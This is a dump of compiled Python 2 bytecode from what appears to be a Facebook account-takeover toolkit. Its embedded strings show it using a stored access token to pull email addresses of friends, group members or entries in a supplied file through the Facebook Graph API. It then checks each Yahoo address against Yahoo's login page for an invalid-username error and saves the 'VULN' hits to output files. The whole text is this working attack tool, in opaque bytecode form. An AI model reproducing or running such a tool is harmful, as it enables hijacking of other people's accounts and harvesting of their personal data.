\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb5\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\t\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\n\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0b\x00GHg\x00\x00}\x00\x00d\x08\x00}\x01\x00t\x0c\x00d\t\x00\x83\x01\x00\x01t\r\x00j\x0e\x00d\n\x00t\x04\x00\x17\x83\x01\x00}\x02\x00t\x0f\x00j\x10\x00|\x02\x00j\x11\x00\x83\x01\x00}\x03\x00t\x02\x00d\x0b\x00d\x0c\x00\x83\x02\x00}\x04\x00t\x0c\x00d\r\x00\x83\x01\x00\x01d\x0e\x00d\x0f\x00\x14GHxw\x01|\x03\x00d\x10\x00\x19D]k\x01}\x05\x00|\x01\x00d\x06\x007}\x01\x00|\x00\x00j\x12\x00|\x01\x00\x83\x01\x00\x01|\x05\x00d\x11\x00\x19}\x06\x00|\x05\x00d\x12\x00\x19}\x07\x00t\r\x00j\x0e\x00d\x13\x00|\x06\x00\x17d\x14\x00\x17t\x04\x00\x17\x83\x01\x00}\x08\x00t\x0f\x00j\x10\x00|\x08\x00j\x11\x00\x83\x01\x00}\t\x00y\xf9\x00|\t\x00d\x15\x00\x19}\n\x00t\x13\x00j\x14\x00d\x16\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x15\x00|\n\x00\x83\x01\x00j\x16\x00\x83\x00\x00}\x0c\x00d\x17\x00|\x0c\x00k\x06\x00rU\x02t\x17\x00j\x02\x00d\x18\x00\x83\x01\x00\x01t\x18\x00t\x17\x00j\x19\x00_\x1a\x00t\x17\x00j\x1b\x00d\x19\x00d\x08\x00\x83\x00\x01\x01|\n\x00t\x17\x00d\x1a\x00<t\x17\x00j\x
1c\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\r\x00t\x13\x00j\x14\x00d\x1b\x00\x83\x01\x00}\x0e\x00y\x19\x00|\x0e\x00j\x15\x00|\r\x00\x83\x01\x00j\x16\x00\x83\x00\x00}\x0f\x00Wn\n\x00\x01\x01\x01w\xff\x00n\x01\x00Xd\x1c\x00|\x0f\x00k\x06\x00rU\x02|\x04\x00j\x1d\x00|\n\x00d\x1d\x00\x17\x83\x01\x00\x01d\x1e\x00|\n\x00\x17d\x1f\x00\x17|\x07\x00\x17GHt\x1e\x00j\x12\x00|\n\x00\x83\x01\x00\x01qU\x02n\x00\x00Wq\xff\x00\x04t\x1f\x00k\n\x00ri\x02\x01\x01\x01q\xff\x00Xq\xff\x00Wd\x0e\x00d\x0f\x00\x14GHd \x00GHd!\x00t \x00t!\x00t\x1e\x00\x83\x01\x00\x83\x01\x00\x17GHd"\x00GH|\x04\x00j"\x00\x83\x00\x00\x01t#\x00d#\x00\x83\x01\x00\x01t$\x00\x83\x00\x00\x01d\x00\x00S($\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00i\x00\x00\x00\x00s3\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGetting email friend \x1b[1;97m...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x10\x00\x00\x00out/MailVuln.txtR\x11\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90Rl\x00\x00\x00Rj\x00\x00\x00R0\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R?\x00\x00\x00s\x03\x00\x00\x00@.*s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR>\x00\x00\x00R\xde\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s\x01\x00\x00\x00\ns(\x00\x00\x00\x1b[1;97m[ \x1b[1;92mVULN\xe2\x9c\x93\x1b[1;97m ] \x1b[1;92ms\n\x00\x00\x00 \x1b[1;97m=>s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s(\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal \x1b[1;91m: \x1b[1;97ms=\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m:\x1b[1;97m out/MailVuln.txts\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack 
\x1b[1;91m](%\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\x94\x00\x00\x00R\xa1\x00\x00\x00t\x07\x00\x00\x00compilet\x06\x00\x00\x00searcht\x05\x00\x00\x00groupRT\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R\\\x00\x00\x00R\x19\x00\x00\x00R\xda\x00\x00\x00R,\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R\xb0\x00\x00\x00(\x10\x00\x00\x00R\xdf\x00\x00\x00t\x03\x00\x00\x00jmlt\x05\x00\x00\x00temant\x05\x00\x00\x00kimakt\x04\x00\x00\x00saveR\x11\x00\x00\x00Rj\x00\x00\x00Rq\x00\x00\x00t\x05\x00\x00\x00linksR\x1e\x00\x00\x00t\x04\x00\x00\x00mailt\x05\x00\x00\x00yahooRp\x00\x00\x00t\x04\x00\x00\x00klikR\x9d\x00\x00\x00t\x03\x00\x00\x00pek(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xfe\x00\x00\x00\x14\x06\x00\x00sr\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x06\x01\x06\x01\n\x01\x13\x01\x12\x01\x0f\x01\n\x01\t\x01\x11\x01\n\x01\r\x01\n\x01\n\x01\x1b\x01\x12\x01\x03\x01\n\x01\x0f\x01\x15\x01\x0c\x01\r\x01\x0c\x01\x10\x01\n\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x07\x01\x0c\x01\x11\x01\x11\x01\x17\x01\r\x01\x08\x01\t\x01\x05\x01\x15\x01\x05\x01\n\x01\n\x01c\x00\x00\x00\x00\x12\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s1\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\t\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\n\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0b\x00GHg\x00\x00}\x00\x00d\x
08\x00}\x01\x00t\x0c\x00d\t\x00\x83\x01\x00}\x02\x00y>\x00t\r\x00j\x0e\x00d\n\x00|\x02\x00\x17d\x0b\x00\x17t\x04\x00\x17\x83\x01\x00}\x03\x00t\x0f\x00j\x10\x00|\x03\x00j\x11\x00\x83\x01\x00}\x04\x00d\x0c\x00|\x04\x00d\r\x00\x19\x17GHWn\'\x00\x04t\x12\x00k\n\x00r\x16\x01\x01\x01\x01d\x0e\x00GHt\x0c\x00d\x0f\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xt\x14\x00d\x10\x00\x83\x01\x00\x01t\r\x00j\x0e\x00d\n\x00|\x02\x00\x17d\x11\x00\x17t\x04\x00\x17\x83\x01\x00}\x05\x00t\x0f\x00j\x10\x00|\x05\x00j\x11\x00\x83\x01\x00}\x06\x00t\x02\x00d\x12\x00d\x13\x00\x83\x02\x00}\x07\x00t\x14\x00d\x14\x00\x83\x01\x00\x01d\x15\x00d\x16\x00\x14GHxw\x01|\x06\x00d\x17\x00\x19D]k\x01}\x08\x00|\x01\x00d\x06\x007}\x01\x00|\x00\x00j\x15\x00|\x01\x00\x83\x01\x00\x01|\x08\x00d\x18\x00\x19}\t\x00|\x08\x00d\r\x00\x19}\n\x00t\r\x00j\x0e\x00d\n\x00|\t\x00\x17d\x0b\x00\x17t\x04\x00\x17\x83\x01\x00}\x0b\x00t\x0f\x00j\x10\x00|\x0b\x00j\x11\x00\x83\x01\x00}\x0c\x00y\xf9\x00|\x0c\x00d\x19\x00\x19}\r\x00t\x16\x00j\x17\x00d\x1a\x00\x83\x01\x00}\x0e\x00|\x0e\x00j\x18\x00|\r\x00\x83\x01\x00j\x19\x00\x83\x00\x00}\x0f\x00d\x1b\x00|\x0f\x00k\x06\x00r\xd1\x02t\x1a\x00j\x02\x00d\x1c\x00\x83\x01\x00\x01t\x1b\x00t\x1a\x00j\x1c\x00_\x1d\x00t\x1a\x00j\x1e\x00d\x1d\x00d\x08\x00\x83\x00\x01\x01|\r\x00t\x1a\x00d\x1e\x00<t\x1a\x00j\x1f\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\x10\x00t\x16\x00j\x17\x00d\x1f\x00\x83\x01\x00}\x03\x00y\x19\x00|\x03\x00j\x18\x00|\x10\x00\x83\x01\x00j\x19\x00\x83\x00\x00}\x11\x00Wn\n\x00\x01\x01\x01w{\x01n\x01\x00Xd \x00|\x11\x00k\x06\x00r\xd1\x02|\x07\x00j 
\x00|\r\x00d!\x00\x17\x83\x01\x00\x01d"\x00|\r\x00\x17d#\x00\x17|\n\x00\x17GHt!\x00j\x15\x00|\r\x00\x83\x01\x00\x01q\xd1\x02n\x00\x00Wq{\x01\x04t\x12\x00k\n\x00r\xe5\x02\x01\x01\x01q{\x01Xq{\x01Wd\x15\x00d\x16\x00\x14GHd$\x00GHd%\x00t"\x00t#\x00t!\x00\x83\x01\x00\x83\x01\x00\x17GHd&\x00GH|\x07\x00j$\x00\x83\x00\x00\x01t\x0c\x00d\x0f\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01d\x00\x00S(\'\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00i\x00\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s8\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGetting email from friend \x1b[1;97m...s\x16\x00\x00\x00/friends?access_token=s\x16\x00\x00\x00out/FriendMailVuln.txtR\x11\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90Rl\x00\x00\x00Rj\x00\x00\x00R?\x00\x00\x00s\x03\x00\x00\x00@.*s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR>\x00\x00\x00R\xde\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s\x01\x00\x00\x00\ns(\x00\x00\x00\x1b[1;97m[ \x1b[1;92mVULN\xe2\x9c\x93\x1b[1;97m ] \x1b[1;92ms\n\x00\x00\x00 \x1b[1;97m=>s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s(\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal \x1b[1;91m: \x1b[1;97msC\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m:\x1b[1;97m 
out/FriendMailVuln.txt(%\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\xb0\x00\x00\x00R \x00\x00\x00R\x94\x00\x00\x00R\xa1\x00\x00\x00R\x03\x01\x00\x00R\x04\x01\x00\x00R\x05\x01\x00\x00RT\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R\\\x00\x00\x00R\x19\x00\x00\x00R\xda\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00(\x12\x00\x00\x00R\xdf\x00\x00\x00R\x06\x01\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\x07\x01\x00\x00R\x08\x01\x00\x00R\t\x01\x00\x00R\x11\x00\x00\x00Rj\x00\x00\x00Rq\x00\x00\x00R\n\x01\x00\x00R\x1e\x00\x00\x00R\x0b\x01\x00\x00R\x0c\x01\x00\x00Rp\x00\x00\x00R\r\x01\x00\x00R\x0e\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xff\x00\x00\x00Q\x06\x00\x00s\x84\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x06\x01\x06\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\x1b\x01\x12\x01\x0f\x01\n\x01\t\x01\x11\x01\n\x01\r\x01\n\x01\n\x01\x1b\x01\x12\x01\x03\x01\n\x01\x0f\x01\x15\x01\x0c\x01\r\x01\x0c\x01\x10\x01\n\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x07\x01\x0c\x01\x11\x01\x11\x01\x17\x01\r\x01\x08\x01\t\x01\x05\x01\x15\x01\x05\x01\n\x01\n\x01c\x00\x00\x00\x00\x12\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s1\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\t\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\n\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\
x00\x83\x01\x00\x01t\x0b\x00GHg\x00\x00}\x00\x00d\x08\x00}\x01\x00t\x0c\x00d\t\x00\x83\x01\x00}\x02\x00y>\x00t\r\x00j\x0e\x00d\n\x00|\x02\x00\x17d\x0b\x00\x17t\x04\x00\x17\x83\x01\x00}\x03\x00t\x0f\x00j\x10\x00|\x03\x00j\x11\x00\x83\x01\x00}\x04\x00d\x0c\x00|\x04\x00d\r\x00\x19\x17GHWn\'\x00\x04t\x12\x00k\n\x00r\x16\x01\x01\x01\x01d\x0e\x00GHt\x0c\x00d\x0f\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xt\x14\x00d\x10\x00\x83\x01\x00\x01t\r\x00j\x0e\x00d\x11\x00|\x02\x00\x17d\x12\x00\x17t\x04\x00\x17\x83\x01\x00}\x05\x00t\x0f\x00j\x10\x00|\x05\x00j\x11\x00\x83\x01\x00}\x06\x00t\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x07\x00t\x14\x00d\x15\x00\x83\x01\x00\x01d\x16\x00d\x17\x00\x14GHxw\x01|\x06\x00d\x18\x00\x19D]k\x01}\x08\x00|\x01\x00d\x06\x007}\x01\x00|\x00\x00j\x15\x00|\x01\x00\x83\x01\x00\x01|\x08\x00d\x19\x00\x19}\x02\x00|\x08\x00d\r\x00\x19}\t\x00t\r\x00j\x0e\x00d\x11\x00|\x02\x00\x17d\x1a\x00\x17t\x04\x00\x17\x83\x01\x00}\n\x00t\x0f\x00j\x10\x00|\n\x00j\x11\x00\x83\x01\x00}\x0b\x00y\xf9\x00|\x0b\x00d\x1b\x00\x19}\x0c\x00t\x16\x00j\x17\x00d\x1c\x00\x83\x01\x00}\r\x00|\r\x00j\x18\x00|\x0c\x00\x83\x01\x00j\x19\x00\x83\x00\x00}\x0e\x00d\x1d\x00|\x0e\x00k\x06\x00r\xd1\x02t\x1a\x00j\x02\x00d\x1e\x00\x83\x01\x00\x01t\x1b\x00t\x1a\x00j\x1c\x00_\x1d\x00t\x1a\x00j\x1e\x00d\x1f\x00d\x08\x00\x83\x00\x01\x01|\x0c\x00t\x1a\x00d \x00<t\x1a\x00j\x1f\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\x0f\x00t\x16\x00j\x17\x00d!\x00\x83\x01\x00}\x10\x00y\x19\x00|\x10\x00j\x18\x00|\x0f\x00\x83\x01\x00j\x19\x00\x83\x00\x00}\x11\x00Wn\n\x00\x01\x01\x01w{\x01n\x01\x00Xd"\x00|\x11\x00k\x06\x00r\xd1\x02|\x07\x00j 
\x00|\x0c\x00d#\x00\x17\x83\x01\x00\x01d$\x00|\x0c\x00\x17d%\x00\x17|\t\x00\x17GHt!\x00j\x15\x00|\x0c\x00\x83\x01\x00\x01q\xd1\x02n\x00\x00Wq{\x01\x04t\x12\x00k\n\x00r\xe5\x02\x01\x01\x01q{\x01Xq{\x01Wd\x16\x00d\x17\x00\x14GHd&\x00GHd\'\x00t"\x00t#\x00t!\x00\x83\x01\x00\x83\x01\x00\x17GHd(\x00GH|\x07\x00j$\x00\x83\x00\x00\x01t\x0c\x00d\x0f\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01d\x00\x00S()\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00i\x00\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s7\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGetting email from group \x1b[1;97m...s\x1b\x00\x00\x00https://graph.facebook.com/s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=s\x14\x00\x00\x00out/GrupMailVuln.txtR\x11\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90Rl\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=R?\x00\x00\x00s\x03\x00\x00\x00@.*s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR>\x00\x00\x00R\xde\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s\x01\x00\x00\x00\ns(\x00\x00\x00\x1b[1;97m[ \x1b[1;92mVULN\xe2\x9c\x93\x1b[1;97m ] \x1b[1;92ms\n\x00\x00\x00 \x1b[1;97m=>s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s(\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal \x1b[1;91m: \x1b[1;97msA\x00\x00\x00\x1b[1;91m[+] 
\x1b[1;92mFile saved \x1b[1;91m:\x1b[1;97m out/GrupMailVuln.txt(%\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\xb0\x00\x00\x00R \x00\x00\x00R\x94\x00\x00\x00R\xa1\x00\x00\x00R\x03\x01\x00\x00R\x04\x01\x00\x00R\x05\x01\x00\x00RT\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R\\\x00\x00\x00R\x19\x00\x00\x00R\xda\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00(\x12\x00\x00\x00R\xdf\x00\x00\x00R\x06\x01\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R\x07\x01\x00\x00R\x08\x01\x00\x00R\t\x01\x00\x00R\x11\x00\x00\x00Rq\x00\x00\x00R\n\x01\x00\x00R\x1e\x00\x00\x00R\x0b\x01\x00\x00R\x0c\x01\x00\x00Rp\x00\x00\x00R\r\x01\x00\x00R\x9d\x00\x00\x00R\x0e\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x00\x01\x00\x00\x97\x06\x00\x00s\x84\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x06\x01\x06\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\x1b\x01\x12\x01\x0f\x01\n\x01\t\x01\x11\x01\n\x01\r\x01\n\x01\n\x01\x1b\x01\x12\x01\x03\x01\n\x01\x0f\x01\x15\x01\x0c\x01\r\x01\x0c\x01\x10\x01\n\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x07\x01\x0c\x01\x11\x01\x11\x01\x17\x01\r\x01\x08\x01\t\x01\x05\x01\x15\x01\x05\x01\n\x01\n\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x93\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\t\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\n\x00k\n\x00r\x84\x00\
x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0b\x00GHt\x0c\x00d\x08\x00\x83\x01\x00}\x00\x00y\x1f\x00t\x02\x00|\x00\x00d\x03\x00\x83\x02\x00}\x01\x00|\x01\x00j\r\x00\x83\x00\x00}\x02\x00Wn\'\x00\x04t\x05\x00k\n\x00r\xeb\x00\x01\x01\x01d\t\x00GHt\x0c\x00d\n\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01n\x01\x00Xg\x00\x00}\x03\x00d\x0b\x00}\x04\x00t\x0f\x00d\x0c\x00\x83\x01\x00\x01t\x02\x00d\r\x00d\x0e\x00\x83\x02\x00}\x05\x00d\x0f\x00d\x10\x00\x14GHt\x02\x00|\x00\x00d\x03\x00\x83\x02\x00j\r\x00\x83\x00\x00}\x02\x00x\x1a\x01|\x02\x00D]\x12\x01}\x06\x00|\x06\x00j\x10\x00d\x11\x00d\x12\x00\x83\x02\x00}\x02\x00|\x04\x00d\x06\x007}\x04\x00|\x03\x00j\x11\x00|\x04\x00\x83\x01\x00\x01t\x12\x00j\x13\x00d\x13\x00\x83\x01\x00}\x07\x00|\x07\x00j\x14\x00|\x02\x00\x83\x01\x00j\x15\x00\x83\x00\x00}\x08\x00d\x14\x00|\x08\x00k\x06\x00r6\x01t\x16\x00j\x02\x00d\x15\x00\x83\x01\x00\x01t\x17\x00t\x16\x00j\x18\x00_\x19\x00t\x16\x00j\x1a\x00d\x16\x00d\x0b\x00\x83\x00\x01\x01|\x02\x00t\x16\x00d\x17\x00<t\x16\x00j\x1b\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\t\x00t\x12\x00j\x13\x00d\x18\x00\x83\x01\x00}\n\x00y\x19\x00|\n\x00j\x14\x00|\t\x00\x83\x01\x00j\x15\x00\x83\x00\x00}\x0b\x00Wn\n\x00\x01\x01\x01q6\x01n\x01\x00Xd\x19\x00|\x0b\x00k\x06\x00rH\x02|\x05\x00j\x1c\x00|\x02\x00d\x11\x00\x17\x83\x01\x00\x01d\x1a\x00|\x02\x00\x17GHt\x1d\x00j\x11\x00|\x02\x00\x83\x01\x00\x01qH\x02q6\x01q6\x01Wd\x0f\x00d\x10\x00\x14GHd\x1b\x00GHd\x1c\x00t\x1e\x00t\x1f\x00t\x1d\x00\x83\x01\x00\x83\x01\x00\x17GHd\x1d\x00GH|\x05\x00j \x00\x83\x00\x00\x01t\x0c\x00d\n\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01d\x00\x00S(\x1e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile path \x1b[1;91m: \x1b[1;97ms\x19\x00\x00\x00\x1b[1;91m[!] 
File not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]i\x00\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x14\x00\x00\x00out/FileMailVuln.txtR\x11\x00\x00\x00i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x01\x00\x00\x00\nR\n\x00\x00\x00s\x03\x00\x00\x00@.*s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR>\x00\x00\x00R\xde\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s(\x00\x00\x00\x1b[1;97m[ \x1b[1;92mVULN\xe2\x9c\x93\x1b[1;97m ] 